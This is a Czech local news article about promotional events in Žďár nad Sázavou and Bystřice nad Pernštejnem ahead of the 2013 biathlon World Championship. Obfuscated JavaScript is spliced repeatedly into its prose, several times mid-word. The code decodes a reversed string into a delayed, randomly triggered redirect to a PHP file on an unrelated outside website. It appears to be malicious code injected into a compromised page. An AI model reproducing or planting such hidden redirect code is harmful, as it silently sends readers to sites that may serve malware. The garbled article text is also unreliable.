Žďár nad Sázavou, zdar nad sazavou, aktuality, biatlon
Rainbow page separator

Biatlon se představí také ve Žďáře

Pátek, 11. ledna 2013

IMG_0784Žďár nad Sázavou / Doprovodné akce na podporu únorového novoměstského mistrovství světa v biatlonu jsou naplánovány také v okresním městě.

Na žďárském náměstí Republiky se objeví například improvizovaná biatlonová střelnice, k ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu bude možnost prohlídky zámku či poutního kostela na Zelené hoře nebo třeba účasti na koncertě v Domě kultury. „Žďár bude jedním z osmi měst v Kraji vysočina, ve kterých se uskuteční upoutávka na biatlonové mistrovství Road show,“ informoval mís["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tostarosta Žďáru Ladislav Bárta. Akce se 31. ledna uskuteční na náměstí Republiky, kromě laserové střelnice, kde si budou moci zájemci vyzkoušet střelbu z malorážky, na náměstí zazpívá i zpěvák Petr Bende.

Le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní největší spor["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní podnik v Česku se dotkne nejenom přímo Nového Města na Moravě, ale rovněž Žďáru nad Sázavou či třeba Bystřice nad Pernštejnem.

Propagační akce Road show se tak 1. února od 14 do 17 hodin odehraje i na bystřickém Masarykově náměstí. „Pro zájemce bude připravena laserová střelnice nebo třeba reklamní upomínkové předměty spojené s biatlonovým mistrovstvím,“ potvrdil bystřický starosta Karel Pačiska s tím, že i v Bystřici divákům zazpívá Petr Bende.

Žďárská radnice pak přímo v době konání biatlonového mistrovství přichystala další kulturní doprovodné akce, na něž společně s reklamou a propagací byla vyčleněna částka 250 tisíc korun. Jedná se například o koncert různých hudebních žánrů v Domě kultury, jehož přesný termín se dolaďuje, vstup na něj má být pro veřejnost zdarma.

Zástupci Žďáru chtějí v rámci zviditelnění města zpřístupnit také poutní kostel svatého Jana Nepomuckého na Zelené hoře a areál žďárského zámku. Zámecké expozice si budou moci návštěvníci prohlédnout od 11. do 15. února od 11 do 16 hodin.